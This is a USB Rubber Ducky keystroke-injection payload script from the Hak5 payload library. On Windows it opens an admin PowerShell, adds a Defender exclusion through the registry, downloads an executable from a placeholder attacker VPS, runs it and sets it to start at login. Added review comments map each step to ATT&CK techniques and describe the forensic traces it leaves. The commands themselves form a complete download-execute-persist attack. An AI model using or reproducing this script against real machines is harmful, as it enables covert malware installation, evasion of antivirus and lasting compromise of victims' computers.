GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/general/The-Perfect-Stealthy-Payload/payload.txt
REM Title: The-Perfect-Stealthy-Payload
REM Author: zb0r
REM Description: Opens PowerShell as admin, creates a folder in Windows/temp called Cache, adds exclusion in Defender, downloads the payload from VPS/ inside the Cache folder, executes it, and adds it to startup
REM Target: Windows
REM Note: This evades most EDRs. // Delay is too big for testing purposes, can be lowered significantly. // I removed every instance of my VPS.
REM Note: replace VPSIPHERE with the IP of your VPS and the correct port (ex:4444) and the name of your payload (ex: Shelzy.exe)
REM Version: 1.0
REM Review note: everything in this file is delivered as typed keystrokes from a USB HID
REM device, so it requires physical access to an unlocked, interactive session. The
REM controls that matter on the defender side are USB device control / HID allow-listing
REM and PowerShell logging, not anything in the script itself. The "evades most EDRs"
REM claim above is the author's and is not demonstrated by anything on this page; each
REM step leaves an observable artifact (process creation, registry set, file write).
REM Constants consumed by the download and persistence steps: the VPS address, the
REM port it serves on, and the file name that is fetched, written to disk and started.
DEFINE #VPSISHERE 0.0.0.0
DEFINE #EXE_NAME Shelzy.exe
DEFINE #PORT 4444
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben

REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.

USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM

REM CONFIGURATION:
REM Poll for the host's lock-LED reply up to #MAX_WAIT times, #CHECK_INTERVAL ms apart
REM (150 x 20 ms = 3 s worst case) before giving up and leaving $_OS at #NOT_WINDOWS.
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
REM Threshold on the number of USB host configuration requests observed during
REM enumeration; strictly more than this is taken as the Windows signature. Why 2
REM separates Windows from other hosts is not explained here - presumably empirical.
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7

REM Default to NOT_WINDOWS; only the check below can promote it to WINDOWS.
$_OS = #NOT_WINDOWS

REM Bounded wait until the host has answered the lock-LED report (presumably meaning the
REM host has finished bringing the keyboard up). This is the "dynamic boot delay" the
REM documentation block refers to; it does not itself decide the OS.
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
REM The OS decision is based solely on the configuration-request count, regardless of
REM whether the loop above timed out or got its reply.
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF

REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 100
REM Review note: the $_OS value produced by the extension above is never consulted in
REM this payload; it runs unconditionally and the extension only acts as a boot delay.
REM Open the Run dialog and launch PowerShell with CTRL SHIFT ENTER. Per the Description
REM header this yields an admin PowerShell; the LEFTARROW/ENTER pair presumably answers
REM the UAC consent dialog (not verifiable from the script itself).
REM Artifact: an interactive, elevated powershell.exe started from the Run box, followed
REM by commands entered at keystroke rate - both visible in process-creation and
REM PowerShell script-block logs.
GUI r
DELAY 500
STRING powershell
DELAY 500
CTRL SHIFT ENTER
DELAY 1000
LEFTARROW
DELAY 1000
ENTER
DELAY 1500
REM Create Cache folder in Windows/temp
REM Artifact: a new directory under %windir%\temp, a commonly used staging path that is
REM cheap to watch with file-creation telemetry.
STRINGLN mkdir "$env:windir\temp\Cache"
DELAY 500

REM Add exclusion in Defender for Cache folder via registry manipulation
REM Defense-evasion step (MITRE ATT&CK T1562.001): writes the Cache path directly into
REM the Defender Exclusions\Paths key under HKLM. Tamper Protection, where enabled, may
REM block this write; otherwise it shows up as a registry-set event on that key and as a
REM Defender configuration-change entry. It also spawns a second PowerShell with
REM -Verb RunAs, so a further elevation may be requested.
STRINGLN Start-Process powershell -Verb RunAs -ArgumentList 'New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" -Name "C:\Windows\Temp\Cache" -Value "C:\Windows\Temp\Cache" -PropertyType String -Force'
DELAY 500

REM Download payload from VPS Invoke-WebRequest
REM Ingress tool transfer (T1105) over plain HTTP to a bare IP. The URL and output path
REM appear verbatim in PowerShell script-block logging, and an executable written under
REM %windir%\temp by powershell.exe is a high-signal file-creation event. The exclusion
REM added above only affects Defender scanning of that folder, not EDR or audit telemetry.
STRINGLN Invoke-WebRequest -Uri "http://#VPSIPHERE:#PORT/#EXE_NAME" -OutFile "$env:windir\temp\Cache\#EXE_NAME"
DELAY 3000

REM Execute the downloaded payload
REM Artifact: powershell.exe parent -> child process whose image path is under
REM %windir%\temp\Cache.
STRINGLN Start-Process "$env:windir\temp\Cache\#EXE_NAME"
DELAY 500

REM Add #EXE_NAME to startup
REM Persistence via the per-user Startup folder (T1547.001): a .lnk created through the
REM WScript.Shell COM object points at the temp-folder executable. The shortcut name is
REM the literal Shelzy.lnk, not derived from #EXE_NAME. Artifact: .lnk creation in
REM %APPDATA%\...\Startup by powershell.exe, plus the WScript.Shell COM load.
STRINGLN $s=(New-Object -COM WScript.Shell).CreateShortcut("$env:appdata\Microsoft\Windows\Start Menu\Programs\Startup\Shelzy.lnk");$s.TargetPath="$env:windir\temp\Cache\#EXE_NAME";$s.Save()
DELAY 500

REM Close the console window; the launched process and the startup shortcut remain.
STRING EXIT
DELAY 300
ENTER